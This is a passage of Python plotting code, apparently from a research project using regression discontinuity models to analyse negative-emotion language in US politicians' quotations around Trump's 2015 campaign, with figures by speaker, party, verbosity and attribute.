text as legend Handle.\n Source: https://stackoverflow.com/questions/27174425/how-to-add-a-string-as-the-artist-in-matplotlib-legend\n \"\"\"\n\n def create_artists(self, legend, text, xdescent, ydescent, width, height, fontsize, trans):\n tx = mText(width / 2., height / 2, text, fontsize=fontsize, ha=\"center\", va=\"center\", fontweight=\"bold\")\n return [tx]\n\n # Allow text annotations for the legend\n Legend.update_default_handler_map({str: TextHandlerB()})\n names = list(set([_get_qid(speaker.name) for speaker in folder.iterdir() if 'outlier' not in speaker.name]))\n\n verbosity_df = pd.read_csv(verbosity)\n verbosity_df = verbosity_df[verbosity_df.QID.isin(names)]\n plot_data = {\n feature: pd.DataFrame(columns=names,\n index=['alpha', 'beta', 'verbosity', 'alpha_low', 'alpha_high', 'beta_low',\n 'beta_high', 'p_alpha', 'p_beta'])\n for feature in CORE_FEATURES\n }\n\n for speaker in folder.iterdir():\n if not (speaker.name.endswith('.pickle')):\n continue\n qid = _get_qid(speaker.name)\n speaker_data = pickle.load(speaker.open('rb'))\n for feature in plot_data:\n summary = pd.read_html(speaker_data.rdd_fit[feature].summary(alpha=alpha_CI).tables[1].as_html(), header=0,\n index_col=0)[0]\n lower_CI, upper_CI = summary.columns[4:6]\n alpha_low, alpha_high = summary[lower_CI].loc['C(threshold)[T.1]'], summary[upper_CI].loc[\n 'C(threshold)[T.1]']\n beta_low, beta_high = summary[lower_CI].loc['C(threshold)[T.1]:time_delta'], summary[upper_CI].loc[\n 'C(threshold)[T.1]:time_delta']\n alpha = summary['coef'].loc['C(threshold)[T.1]']\n beta = summary['coef'].loc['C(threshold)[T.1]:time_delta']\n p_alpha = speaker_data.rdd_fit[feature].pvalues['C(threshold)[T.1]']\n p_beta = speaker_data.rdd_fit[feature].pvalues['C(threshold)[T.1]:time_delta']\n plot_data[feature].at['p_alpha', qid] = p_alpha\n plot_data[feature].at['p_beta', qid] = p_beta\n plot_data[feature].at['alpha', qid] = alpha\n plot_data[feature].at['alpha_low', qid] = alpha_low\n plot_data[feature].at['alpha_high', qid] = alpha_high\n plot_data[feature].at['beta', qid] = beta\n plot_data[feature].at['beta_low', qid] = beta_low\n plot_data[feature].at['beta_high', qid] = beta_high\n plot_data[feature].at['verbosity', qid] = verbosity_df[verbosity_df.QID == qid]['Unique Quotations'].values[0]\n\n for param in kwargs.get('params', ('alpha', 'beta')):\n if kwargs.get('axs', None) is None:\n if kind == 'individual':\n fig, all_axs = plt.subplots(figsize=[17.8, 9], ncols=5, nrows=2, sharey='row')\n axs = all_axs[0, :]\n axs_cum = all_axs[1, :]\n else:\n fig, axs = plt.subplots(figsize=NARROW_TWO_COL_FIGSIZE, ncols=5, nrows=1, sharex='all', sharey='all')\n else:\n assert kwargs.get('params', None) is not None\n axs = kwargs.get('axs')\n fig = plt.gcf()\n\n significant_count = 0\n significant_positive = 0\n cumulative_annotations = []\n cumulative_values = dict()\n for i, (feature, data) in enumerate(plot_data.items()):\n verbosity2sign = []\n ax = axs[i]\n ax.set_xscale('log')\n if kind == 'individual':\n ax.axhline(y=0, linestyle='--', color='black', linewidth=0.8)\n else:\n key = 'C(threshold)[T.1]' if param == 'alpha' else 'C(threshold)[T.1]:time_delta'\n baseline = base_model.rdd[feature][key]\n summary = \\\n pd.read_html(base_model.rdd_fit[feature].summary(alpha=alpha_CI).tables[1].as_html(), header=0,\n index_col=0)[0]\n base_low, base_high = summary[lower_CI].loc[key], summary[upper_CI].loc[key]\n ax.axhline(y=baseline, linestyle='--', color='black')\n for qid in data.columns:\n isTrump = int(qid == 'Q22686')\n CI_low, CI_high = data[qid].loc[param + '_low'], data[qid].loc[param + '_high']\n param_pval = data[qid].loc[f'p_{param}']\n # Highlight \"significant\" points where CIs share a sign\n clr = STYLES[feature]['color']\n if kind == 'individual':\n color = clr if (CI_low * CI_high > 0) else 'grey'\n significant_count += int(param_pval < 0.05)\n significant_positive += int((param_pval < 0.05) and (data[qid].loc[param] > 0))\n else:\n # color = clr if (base_low > CI_high) else 'grey'\n color = clr if isTrump else 'grey'\n ax.plot((data[qid].loc['verbosity'], data[qid].loc['verbosity']), (CI_low, CI_high), '-', color=color,\n linewidth=0.3 + 2 * isTrump)\n ax.scatter(x=data[qid].loc['verbosity'], y=data[qid].loc[param], c=color, s=7.5 * (1 + 3 * isTrump))\n verbosity2sign.append([data[qid].loc['verbosity'], data[qid].loc[param] > 0])\n if qid in PROMINENCE_IDS:\n x_annot = int(data[qid].loc['verbosity'])\n y_annot = CI_low\n cumulative_annotations.append((qid, x_annot))\n offset = 0.08 if param == 'alpha' else 0.002\n if kind == 'individual':\n offset *= 3\n va = 'top'\n if (param == 'alpha') and (isTrump and (feature in ['liwc_Anger', 'liwc_Anx']) or feature == 'liwc_Sad'):\n y_annot = CI_high + 3 * offset # Annotation would leave the axis else\n va = 'bottom'\n ax.annotate(PROMINENCE_SHORT[PROMINENCE_IDS[qid]], (x_annot, y_annot - offset), ha='center',\n va=va, label=PROMINENCE_IDS[qid], fontweight='bold', fontsize=FONTSIZE - 4)\n\n if kind == 'individual':\n annot = rf'$\\{param}>0: {(data.loc[param] > 0).sum()}/{len(data.columns)}$' + '\\n' + \\\n rf'(${significant_positive}/{significant_count}$' + rf' with $p<0.05$)'\n box_props = dict(boxstyle='round', facecolor=None, alpha=0, ec='none')\n # Commented out, info is now contained in the cumulative plot\n # ax.text(0.97, 0.05, annot, transform=ax.transAxes, fontsize=FONTSIZE - 2, multialignment='center',\n # verticalalignment='bottom', horizontalalignment='right', bbox=box_props)\n\n ax.set_title(NAMES[feature], fontsize=FONTSIZE, fontweight='bold')\n ax.tick_params(labelbottom=True)\n ax.set_title('(' + kwargs.get('prefix', string.ascii_lowercase)[i] + ')', fontfamily='serif', loc='left',\n fontsize=FONTSIZE+2, fontweight='bold')\n if i > 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n else:\n labelText = 'without individuals' if kind == 'ablation' else 'for individuals only'\n ax.set_ylabel(r'$\\{}$ {}'.format(param, labelText), fontsize=FONTSIZE-2)\n if (param == 'alpha') and (kind == 'individual'):\n ax.set_ylim(-20, 20)\n ax.set_yticks([-10, 10])\n ax.set_yticklabels(['-10', '10'])\n elif (param == 'alpha') and (kind == 'ablation'):\n ax.set_ylim([-.5, 3])\n elif (param == 'beta') and (kind == 'ablation'):\n ax.set_ylim([-0.01, 0.05])\n ax.set_xlabel('Number of quotes', fontsize=FONTSIZE-2)\n\n # Now make the cumulative plot\n if kind == 'individual':\n ax = axs_cum[i]\n ax.set_xscale('log')\n ax.set_xlabel('Number $n$ of quotes', fontsize=FONTSIZE-2)\n ax.set_title(NAMES[feature], fontsize=FONTSIZE, fontweight='bold')\n ax.set_title('(' + kwargs.get('prefix', string.ascii_lowercase)[5+i] + ')', fontfamily='serif',\n loc='left', fontsize=FONTSIZE + 2, fontweight='bold')\n x_axis, is_positive = zip(*sorted(verbosity2sign, reverse=True)) # Verbose to \"silent\"\n y_axis = [sum(is_positive[:i]) / i for i in range(1, 1+len(x_axis))] # Running mean from right to left\n ax.axhline(.5, linewidth=.5, linestyle='dashed', color='grey')\n ax.plot(x_axis, y_axis, color=STYLES[feature]['color'], linewidth=STYLES[feature]['linewidth'])\n cumulative_values[feature] = [x_axis, y_axis]\n if i > 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n else:\n ax.set_ylabel('Fraction of speakers with $\\\\{} > 0$\\namong those with $\\geq n$ quotes'.format(param), fontsize=FONTSIZE-2)\n\n # Annotate famous speakers\n for qid, x_val in cumulative_annotations:\n y_val = y_axis[x_axis.index(x_val)]\n\n ax.annotate(PROMINENCE_SHORT[PROMINENCE_IDS[qid]], (x_val, y_val + 0.03), ha='center', va='bottom',\n label=PROMINENCE_IDS[qid], fontweight='bold', fontsize=FONTSIZE-4)\n ax.scatter(x_val, y_val, color=STYLES[feature]['color'])\n if param == 'alpha':\n ax.set_ylim(0.3, 1.1)\n\n labels = list(PROMINENCE_SHORT.keys())\n handles = [PROMINENCE_SHORT[k] for k in labels]\n y_offset = -.15 if kind == 'ablation' else -.1\n fig.legend(fontsize=FONTSIZE, ncol=4, loc='lower center', bbox_to_anchor=(.5, y_offset),\n labels=labels, handles=handles)\n plt.tight_layout()\n\n if kind == 'individual':\n pickle.dump(cumulative_values, base.joinpath('cumulative_{}.pickle'.format(param)).open('wb'))\n\n if kwargs.get('axs', None) is None:\n saveFigure(fig, base.joinpath('verbosity_vs_{}'.format(param)))\n\n\ndef ablation_plots(folder: Path, base: Path):\n \"\"\"\n Generates two kinds of plots: One summarizing ablation plots, showing verbosity vs. the influence of leaving one\n speaker out on the overall parameters and then an \"individual\" plot for the newly fitted lines for all speakers\n that can be mapped to their real world names.\n Parameters\n ----------\n folder: Parent folder, containing RDDs fitted on data from all-but-one-individual each\n base: Base folder where to store figures in\n \"\"\"\n verbosity_vs_parameter(folder, base, 'ablation')\n # fig, axs = plt.subplots(nrows=2, ncols=5, figsize=TWO_COL_FIGSIZE, sharex='all', sharey='row')\n # verbosity_vs_parameter(folder, base, 'ablation', alpha_CI=0.17, params=['alpha'], axs=axs[0])\n # verbosity_vs_parameter(folder.parent.joinpath('Individuals'), base.parent.joinpath('Individuals'),\n # 'individual', alpha_CI=0.17, params=['alpha'], axs=axs[1], prefix='fghijklmno')\n # saveFigure(fig, base.parent.joinpath('combinedIndividual').joinpath('alpha.pdf'))\n\n\ndef individuals(folder: Path, base: Path):\n \"\"\"\n Creates all feature plots for every feature for every individual RDD in the given folder.\n Parameters\n ----------\n folder: Parent folder, containing RDDs fitted on individual aggregates\n base: Base folder to store figures in\n \"\"\"\n individual_plots(folder, base)\n verbosity_vs_parameter(folder, base, 'individual')\n\n\ndef party_plots(folder: Path, base: Path):\n \"\"\"\n Creates party comparison plots\n Parameters\n ----------\n folder: Folder that contains verbosity-grouped RDD fits.\n base: Base path to store plots in\n \"\"\"\n\n def _get_party_name(path: Path) -> str:\n if 'without' in path.name:\n return path.name\n model_name = path.name.split('.')[0]\n return model_name.split('_')[-1]\n\n model_files = [file for file in folder.iterdir() if file.name.endswith('pickle') and ('outliers' not in file.name)]\n models = {_get_party_name(p): pickle.load(p.open('rb')) for p in model_files}\n features = [col for col in models['democrats'].data.columns if ('empath' in col) or ('liwc' in col)]\n\n for feature in features:\n fig, ax = plt.subplots(figsize=ONE_COL_FIGSIZE)\n lower, upper = (13926.0, 18578.0) # Hard coded numeric Quotebank Date limits + margin\n\n y_min = np.Inf\n y_max = - np.Inf\n for party, model in models.items():\n # Adapt y-limits of the plot to the scatter values\n y_min = min(y_min, min(model.data[feature]))\n y_max = max(y_max, max(model.data[feature]))\n _scatter_only(ax, feature, model, PARTY_STYLES[party]['color'], s=40)\n _rdd_only(ax, feature, model, PARTY_STYLES[party])\n _conf_only(ax, feature, model, PARTY_STYLES[party]['color'])\n\n y_diff = y_max - y_min\n ax.set_xlim(lower, upper)\n ax.set_ylim(y_min - y_diff, y_max + y_diff)\n ax.legend(loc='lower left', ncol=2, fontsize=FONTSIZE)\n\n title = ', '.join([\n f'$r^2_{\"{DEM, adj}\"}$={models[\"democrats\"].rdd[feature].loc[\"r2_adj\"]:.2f}',\n f'$r^2_{\"{REP, adj}\"}$={models[\"republicans\"].rdd[feature].loc[\"r2_adj\"]:.2f}',\n r'$\\sigma_{DEM}$: ' + f'{models[\"democrats\"].data[feature].std():.2f}',\n r'$\\sigma_{REP}$: ' + f'{models[\"republicans\"].data[feature].std():.2f}',\n ])\n ax.set_title(title, fontsize=FONTSIZE)\n\n hrFeature = feature # Human readable, as used in the tables\n box = '\\n'.join([\n ', '.join([\n r'$\\alpha_{0, DEM}$: ' + str(\n models[\"democrats\"].get_table(asPandas=True).loc[hrFeature][r'$\\alpha_0$']),\n r'$\\beta_{0, DEM}$: ' + str(models[\"democrats\"].get_table(asPandas=True).loc[hrFeature][r'$\\beta_0$']),\n r'$\\alpha_{DEM}$: ' + str(models[\"democrats\"].get_table(asPandas=True).loc[hrFeature][r'$\\alpha$']),\n r'$\\beta_{DEM}$: ' + str(models[\"democrats\"].get_table(asPandas=True).loc[hrFeature][r'$\\beta$']),\n ]), ', '.join([\n r'$\\alpha_{0, REP}$: ' + str(\n models[\"republicans\"].get_table(asPandas=True).loc[hrFeature][r'$\\alpha_0$']),\n r'$\\beta_{0, REP}$: ' + str(\n models[\"republicans\"].get_table(asPandas=True).loc[hrFeature][r'$\\beta_0$']),\n r'$\\alpha_{REP}$: ' + str(models[\"republicans\"].get_table(asPandas=True).loc[hrFeature][r'$\\alpha$']),\n r'$\\beta_{REP}$: ' + str(models[\"republicans\"].get_table(asPandas=True).loc[hrFeature][r'$\\beta$'])\n ])\n ])\n box_props = dict(boxstyle='round', facecolor='white', alpha=1)\n ax.text(0.975, 0.95, box, transform=ax.transAxes, fontsize=FONTSIZE - 4, multialignment='center',\n verticalalignment='top', horizontalalignment='right', bbox=box_props)\n\n fig.autofmt_xdate(rotation=75)\n plt.minorticks_off()\n\n saveFigure(fig, base.joinpath(feature))\n plt.close()\n\n # Grid\n fig, axs = grid(models, 5, 1, CORE_FEATURES, PARTY_STYLES, legend=True)\n saveFigure(fig, base.joinpath('grid'))\n plt.close()\n\n\ndef verbosity_plots(folder: Path, base: Path, verbosity_groups: Tuple[int] = (0, 3)):\n \"\"\"\n Creates Verbosity comparison plots\n Parameters\n ----------\n folder: Folder that contains verbosity-grouped RDD fits.\n base: Base path to store plots in\n verbosity_groups: Selection of verbosity groups that shall be plotted\n \"\"\"\n\n def _get_verbosity_number(path: Path) -> int:\n return int(re.search('[0-9]+', path.name)[0])\n\n model_files = [file for file in folder.iterdir() if file.name.endswith('pickle') and ('outliers' not in file.name)]\n models = {_get_verbosity_number(p): pickle.load(p.open('rb')) for p in model_files}\n features = SI_FEATURES\n\n SI_fig, SI_axs = plt.subplots(ncols=7, nrows=4, sharex='all', sharey='all', figsize=LANDSCAPE_FIGSIZE)\n SI_fig.subplots_adjust(wspace=.04, hspace=1, bottom=.3)\n\n lower, upper = (13926.0, 18578.0) # Hard coded numeric Quotebank Date limits + margin\n for feature in features:\n fig, axs = plt.subplots(figsize=NARROW_TWO_COL_FIGSIZE, ncols=4, sharex='all', sharey='all')\n y_min = np.Inf\n y_max = - np.Inf\n\n for verbosity, model in models.items():\n ax = axs[verbosity]\n model.plot(feature, ax=ax, parameters=False, visuals=False, color=STYLES[feature]['color'], lin_reg=False,\n annSize=FONTSIZE - 2, scatter_color=STYLES[feature]['color'])\n if feature in SI_FEATURES:\n model.plot(feature, ax=SI_axs[verbosity][SI_FEATURES.index(feature)], parameters=False, visuals=False,\n color=STYLES[feature]['color'], lin_reg=False, scatter_color=STYLES[feature]['scatter_color'],\n linewidth=2)\n _grid_annotate(SI_axs[verbosity][SI_FEATURES.index(feature)], model, feature, param_y=.95)\n # Adapt y-limits of the plot to mean\n _, Y = model._get_rdd_plot_data(feature)\n y_min = min(y_min, min(Y))\n y_max = max(y_max, max(Y))\n ax.set_title(NAMES[feature] + '\\n' + V_label[verbosity], fontsize=FONTSIZE - 2, fontweight='bold')\n ax.set_title('(' + string.ascii_lowercase[verbosity] + ')\\n', fontfamily='serif', loc='left',\n fontsize=FONTSIZE+2, fontweight='bold')\n\n if verbosity == 0:\n ax.set_ylabel('Pre-campaign z-scores', fontsize=FONTSIZE)\n _grid_annotate(ax, model, feature)\n\n y_diff = y_max - y_min\n for ax in axs:\n ax.set_xlim(lower, upper)\n ax.set_ylim(y_min - y_diff, y_max + y_diff)\n\n fig.autofmt_xdate(rotation=90, ha='left')\n plt.minorticks_off()\n\n saveFigure(fig, base.joinpath(feature))\n\n for i, row in enumerate(SI_axs):\n for j, ax in enumerate(row):\n ax.set_ylim([-7, 7.5])\n ax.set_title('(' + ('I', 'II', 'III', 'IV')[i] + '.' + string.ascii_lowercase[j] + ')', fontfamily='serif',\n loc='left', fontsize=FONTSIZE-2, fontweight='bold')\n ax.set_title(NAMES[SI_FEATURES[j]], fontsize=FONTSIZE-2, fontweight='bold')\n if j != 0:\n ax.tick_params(axis='y', which='both', left=False, right=False)\n if j == 3:\n ax.text(0.5, 1.33, V_label[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n plt.minorticks_off()\n\n saveFigure(SI_fig, base.joinpath('Verbosity_all'), excludeTightLayout=True)\n plt.close('all')\n\n\ndef attribute_plots(model_path: Path, base: Path):\n attributes = ['Intercept', 'C(threshold)[T.1]', 'time_delta', 'C(threshold)[T.1]:time_delta',\n 'party', 'governing_party', 'congress_member', 'gender']\n annotate = {\n 'gender': ['Male', 'Female'],\n 'party': ['Republicans', 'Democrats'],\n 'congress_member': ['Others', 'Congress'],\n 'governing_party': ['Opposition', 'Government']\n }\n model = pickle.load(model_path.open('rb'))\n\n styles_cpy = {NAMES[key]: val for key, val in STYLES.items()}\n\n ORDER = ['liwc_Negemo', 'liwc_Anger', 'liwc_Anx', 'liwc_Sad', 'liwc_Swear']\n titles = deepcopy(TITLES)\n for key, val in titles.items():\n titles[key] = re.sub(r'\\$(.*)\\$', r'$\\\\mathbf{\\1}$', titles[key])\n\n fig, axs = plt.subplots(figsize=TWO_COL_FIGSIZE, ncols=4, nrows=2)\n for i, att in enumerate(attributes):\n ROW = i // 4\n COL = i % 4\n ax = axs[ROW][COL]\n df = pd.DataFrame(data=None, index=ORDER, columns=['mean', 'low', 'high'])\n\n for feat in ORDER:\n summary = pd.read_html(model.rdd_fit[feat].summary().tables[1].as_html(), header=0, index_col=0)[0]\n lower, upper = summary['[0.025'].loc[att], summary['0.975]'].loc[att]\n mean = summary['coef'].loc[att]\n df.loc[feat] = (mean, lower, upper)\n\n df = df.reindex(ORDER[::-1])\n for _, r in df.iterrows():\n name = NAMES[r.name]\n color = styles_cpy[name]['color']\n ax.plot((r.low, r.high), (name, name), '|-', color='black', linewidth=1.33)\n ax.plot(r['mean'], name, 'o', color=color, markersize=7.5)\n\n if 'time_delta' not in att: # All but betas\n ax.set_xlim([-4.5, 4.5])\n ax.set_xticks([-4, -2, 0, 2, 4])\n ax.set_xlabel('Pre-campaign z-scores', fontsize=FONTSIZE - 2)\n else:\n ax.set_xlim([-0.075, 0.075])\n ax.set_xticks([-0.05, 0, 0.05])\n ax.set_xlabel('Pre-campaign z-scores per month', fontsize=FONTSIZE - 2)\n\n if att in annotate:\n left, right = annotate[att]\n ax.text(x=0.05, y=0.9, s=r'{}$\\longleftarrow$'.format(left), fontsize=FONTSIZE - 2, ha='left',\n va='bottom', transform=ax.transAxes)\n ax.text(x=0.95, y=0.9, s=r'$\\longrightarrow${}'.format(right), fontsize=FONTSIZE - 2, ha='right',\n va='bottom', transform=ax.transAxes)\n\n ax.tick_params(axis='both', labelsize=FONTSIZE - 2)\n ax.set_title(titles[att], fontsize=FONTSIZE - 2, fontweight='bold')\n ax.set_title('(' + string.ascii_lowercase[i] + ')', fontfamily='serif', loc='left', fontsize=FONTSIZE+2, fontweight='bold')\n ax.axvline(x=0, linestyle='dashed', color='black', linewidth=0.5)\n lower, upper = ax.get_ylim()\n ax.set_ylim(lower - .5, upper + .5)\n\n if COL in (1, 2):\n ax.set_yticklabels([])\n ax.tick_params(axis='y', which='both', left=False, right=False)\n\n if COL == 3:\n ax.yaxis.tick_right()\n\n plt.tight_layout()\n saveFigure(fig, base.joinpath('selected_attributes'))\n plt.close()\n\n\ndef plot_quantities(data_path: Path, base: Path):\n \"\"\"\n Plots some quantitative overview stats.\n Parameters\n ----------\n data_path: csv file\n base: Image folder\n \"\"\"\n print('Monthly quotes and speakers')\n df = pd.read_csv(data_path)\n df['dt_month'] = df.apply(lambda r: datetime(int(r.year), int(r.month), 15), axis=1)\n fig, axs = plt.subplots(figsize=ONE_COL_FIGSIZE, nrows=2)\n for i, col, name in ((0, 'num_speaker', 'Monthly Speakers'), (1, 'num_quotes', 'Unique Monthly Quotations')):\n fig, ax = timeLinePlot(x=df.dt_month,\n y=df[col],\n kind='scatter',\n snsargs={'color': 'black'},\n ax=axs[i])\n drop_mask = df.dt_month.isin(DROPPED_DATA)\n fig, ax = timeLinePlot(x=df.dt_month[drop_mask],\n y=df[col][drop_mask],\n kind='scatter',\n snsargs={'color': 'grey'},\n ax=axs[i])\n ax.set_title(name, fontsize=FONTSIZE)\n ax.set_xlim(13926.0, 18578.0)\n\n axs[0].set_ylim([0, 11000])\n axs[0].set_yticks([5000, 10000])\n axs[1].set_ylim([0, 300000])\n axs[1].set_yticks([100000, 200000])\n\n saveFigure(fig, base.joinpath('quantities.pdf'))\n plt.close()\n\n\ndef RDD_kink_performance(data_path: Path, base: Path):\n \"\"\"\n Plots the performance of the RDD, depending on the date of the discontinuity / kink\n \"\"\"\n data = pickle.load(data_path.open('rb'))\n if 'YouGov' in str(data_path):\n base = base.joinpath('YouGov')\n base.mkdir(exist_ok=True)\n dates = list(data.keys())\n ylabeltext = r\"$R^2_{\\mathrm{adj}}$\"\n fig, ax = plt.subplots(figsize=TWO_COL_FIGSIZE)\n rdd_style = deepcopy(STYLES)\n for f in rdd_style:\n try:\n del rdd_style[f]['scatter_color']\n except KeyError:\n pass\n\n for feature in CORE_FEATURES:\n timeLinePlot(\n x=dates,\n y=[data[dt][feature]['r2_adjust'] for dt in dates],\n snsargs=dict(label=NAMES[feature], **{key: val for key, val in rdd_style[feature].items() if key !='label'}),\n ax=ax,\n includeElections=False\n )\n ax.axvline(mdates.date2num(KINK), color='black', linestyle='--')\n plt.legend(fontsize=FONTSIZE, loc='upper right', framealpha=1, fancybox=False, ncol=3)\n ax.set_ylabel(ylabeltext, fontsize=FONTSIZE)\n saveFigure(fig, base.joinpath('r2_adj'))\n\n fig, ax = plt.subplots(figsize=TWO_COL_FIGSIZE)\n timeLinePlot(\n x=dates,\n y=[data[dt]['liwc_Posemo']['r2_adjust'] for dt in dates],\n snsargs=dict(label=NAMES['liwc_Posemo'], **rdd_style['liwc_Posemo']),\n ax=ax,\n includeElections=False)\n ax.axvline(mdates.date2num(KINK), color='black', linestyle='--')\n plt.legend(fontsize=FONTSIZE - 2, loc='upper right', framealpha=1, fancybox=False, ncol=3)\n ax.set_ylabel(ylabeltext, fontsize=FONTSIZE)\n saveFigure(fig, base.joinpath('r2_adj_posemo'))\n\n fig, ax = plt.subplots(figsize=TWO_COL_FIGSIZE)\n for feature in ['empath_negative_emotion', 'empath_swearing_terms']:\n timeLinePlot(\n x=dates,\n y=[data[dt][feature]['r2_adjust'] for dt in dates],\n snsargs=dict(label=re.sub('\\n', ' ', NAMES[feature]), **rdd_style[feature]),\n ax=ax,\n includeElections=False\n )\n ax.axvline(mdates.date2num(KINK), color='black', linestyle='--')\n plt.legend(fontsize=FONTSIZE, loc='upper right', framealpha=1, fancybox=False, ncol=1)\n ax.set_ylabel(ylabeltext, fontsize=FONTSIZE)\n saveFigure(fig, base.joinpath('r2_empath'))\n\n plt.close('all')\n\n\ndef aggregation_overview(QuotationAggregation_RDD: RDD, SpeakerAggregation_RDD: RDD, democrats: RDD, republicans: RDD,\n folder: Path):\n \"\"\"\n Combines the plots for the three key aggregations (Quotations, Speaker, Party) in one figure.\n Parameters\n ----------\n QuotationAggregation_RDD: RDD model of the quotation aggregation\n SpeakerAggregation_RDD: RDD model of the speaker aggregation\n democrats: RDD model of the quotation aggregation for democrats\n republicans: RDD model of the quotation aggregation for republicans\n folder: Where to store the plot\n \"\"\"\n print('Large Aggregation Grid')\n democratStyle = deepcopy(STYLES)\n republicanStyle = deepcopy(STYLES)\n for key in republicanStyle:\n republicanStyle[key]['color'] = 'grey'\n republicanStyle[key]['scatter_color'] = 'grey'\n republicanStyle[key]['label'] = 'Republicans'\n democratStyle[key]['label'] = 'Democrats'\n partyStyle = {'democrats': democratStyle, 'republicans': republicanStyle}\n\n fig, axs = plt.subplots(ncols=5, nrows=3, figsize=[NARROW_TWO_COL_FIGSIZE[0], 3 * NARROW_TWO_COL_FIGSIZE[1]], sharey='all')\n plt.subplots_adjust(wspace=.04, hspace=.6, bottom=.3)\n\n quot = axs[0, :]\n speak = axs[1, :]\n party = axs[2, :]\n\n grid({'agg': QuotationAggregation_RDD}, 5, 1, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2,\n ylabel='Pre-campaign z-scores', axs=quot)\n grid({'agg': SpeakerAggregation_RDD}, 5, 1, CORE_FEATURES, STYLES, grid_annotate=True, fontsize=FONTSIZE-2,\n ylabel='Pre-campaign z-scores', axs=speak, prefix=string.ascii_lowercase[5:])\n\n grid({'democrats': democrats, 'republicans': republicans}, 5, 1, CORE_FEATURES, partyStyle, fontsize=FONTSIZE-2,\n grid_annotate=False, ylabel='Pre-campaign z-scores', axs=party, prefix=string.ascii_lowercase[10:],\n legend=True)\n\n txt = ['Quote-level aggregation', 'Speaker-level aggregation', 'Quote-level aggregation by party']\n for i, row in enumerate(axs):\n for j, ax in enumerate(row):\n ax.set_ylim([-7, 7])\n if j == 2:\n ax.text(0.5, 1.2, txt[i], fontsize=FONTSIZE, fontweight='bold', va='center', ha='center',\n transform=ax.transAxes)\n ax.tick_params(labelbottom=True)\n plt.setp(ax.get_xticklabels(), rotation=90, ha=\"left\")\n\n saveFigure(fig, folder.joinpath('Negativity.pdf'), excludeTightLayout=True)\n\n # Positive\n fig, axs = plt.subplots(ncols=3, nrows=1, figsize=NARROW_TWO_COL_FIGSIZE, sharex='all', sharey='all')\n _scatter_only(axs[0], 'liwc_Posemo', QuotationAggregation_RDD, STYLES['liwc_Posemo']['color'], s=40)\n axs[0].set_title(NAMES['liwc_Posemo'] + '\\n' + txt[0], fontweight='bold', fontsize=FONTSIZE)\n axs[0].set_ylabel('Pre-campaign z-scores', fontsize=FONTSIZE)\n axs[0].set_title('(a)', fontfamily='serif', loc='left', fontsize=FONTSIZE+2, fontweight='bold')\n\n _scatter_only(axs[1], 'liwc_Posemo', SpeakerAggregation_RDD, STYLES['liwc_Posemo']['color'], s=40)\n axs[1].set_title(NAMES['liwc_Posemo'] + '\\n' + txt[1], fontweight='bold', fontsize=FONTSIZE)\n axs[1].set_title('(b)', fontfamily='serif', loc='left', fontsize=FONTSIZE+2, fontweight='bold')\n\n timeLinePlot(democrats.data.date, democrats.data['liwc_Posemo'], ax=axs[2],\n snsargs={'s': 40, 'color': STYLES['liwc_Posemo']['color'], 'label': 'Democrats'},\n kind='scatter')\n timeLinePlot(republicans.data.date, republicans.data['liwc_Posemo'], ax=axs[2],\n snsargs={'s': 40, 'color': 'grey', 'label': 'Republicans'},\n kind='scatter')\n axs[2].set_title(NAMES['liwc_Posemo'] + '\\n' + txt[2], fontweight='bold', fontsize=FONTSIZE)\n axs[2].set_title('(c)', fontfamily='serif', loc='left', fontsize=FONTSIZE+2, fontweight='bold')\n axs[2].legend(loc='lower center', ncol=2)\n\n fig.autofmt_xdate(rotation=90, ha='left')\n plt.minorticks_off()\n\n saveFigure(fig, folder.joinpath('Positive.pdf'))\n\n\ndef title_figure(president_verbosity: pd.DataFrame, raw_negemo: pd.DataFrame, quoteAggregationRDD: RDD, folder: Path):\n \"\"\"\n Plots the raw liwc score of the negative emotion liwc category vs. the relative share of quotes\n uttered by Donald Trump vs Barack Obama\n \"\"\"\n # Custom Legend Patches (multicolor) for the background\n # From: https://stackoverflow.com/questions/31908982/python-matplotlib-multi-color-legend-entry\n class MulticolorPatch:\n def __init__(self, colors):\n self.colors = colors\n\n class MulticolorPatchHandler:\n def legend_artist(self, legend, orig_handle, fontsize, handlebox):\n width, height = handlebox.width, handlebox.height\n patches = []\n for i, c in enumerate(orig_handle.colors):\n patches.append(\n plt.Rectangle(\n (float(width / len(orig_handle.colors) * i - handlebox.xdescent), float(-handlebox.ydescent)),\n width / len(orig_handle.colors),\n height,\n facecolor=c,\n edgecolor='none'\n )\n )\n patch = PatchCollection(patches, match_original=True)\n\n handlebox.add_artist(patch)\n return patch\n print('Title Figure')\n dates = sorted(raw_negemo['date'].unique())\n shares = pd.DataFrame(data=None, columns=['trump', 'obama', 'total'],\n index=dates)\n for dt in shares.index:\n total = president_verbosity[president_verbosity.date == dt]['numQuotes'].sum()\n trump = president_verbosity[(president_verbosity.date == dt) & (president_verbosity.qid == 'Q22686')] \\\n ['numQuotes'].iloc[0]\n obama = president_verbosity[(president_verbosity.date == dt) & (president_verbosity.qid == 'Q76')] \\\n ['numQuotes'].iloc[0]\n shares.at[dt, 'trump'] = trump\n shares.at[dt, 'obama'] = obama\n shares.at[dt, 'total'] = total\n\n fig, (left, right) = plt.subplots(figsize=TWO_COL_FIGSIZE, ncols=2)\n # fig, left_axis = plt.subplots(figsize=TWO_COL_FIGSIZE)\n presidents = left.twinx()\n\n leftStyle = {'label': 'Negative emotion (all politicians)', 'color': 'black', 'linewidth': 3}\n fig, left = timeLinePlot(x=dates, y=raw_negemo.liwc_Negemo,\n snsargs=leftStyle,\n kind='line',\n ax=left,\n zorder=1,\n includeElections=False)\n fig, left = timeLinePlot(x=dates, y=raw_negemo.liwc_Negemo,\n snsargs={'color': 'black', 's': 50, 'edgecolor': 'black'},\n kind='scatter',\n ax=left,\n zorder=1,\n includeElections=False)\n\n left.set_ylabel('Negative emotion score', fontsize=FONTSIZE)\n left.axvline(x=mdates.date2num([datetime(2015, 6, 15)])[0], color='tab:red', linewidth=2.5)\n left.text(0.59, 0.05, \"June 2015: Beginning of\\nTrump's primary campaign\", transform=left.transAxes,\n color='tab:red', fontsize=FONTSIZE, fontweight='bold')\n left.set_xlim(*mdates.date2num([min(dates)]), *mdates.date2num([max(dates)]))\n left.set_facecolor('none')\n\n presidents.set_ylim([0, 1])\n presidents.set_yticklabels([])\n presidents.tick_params(axis='y', which='both', right=False)\n 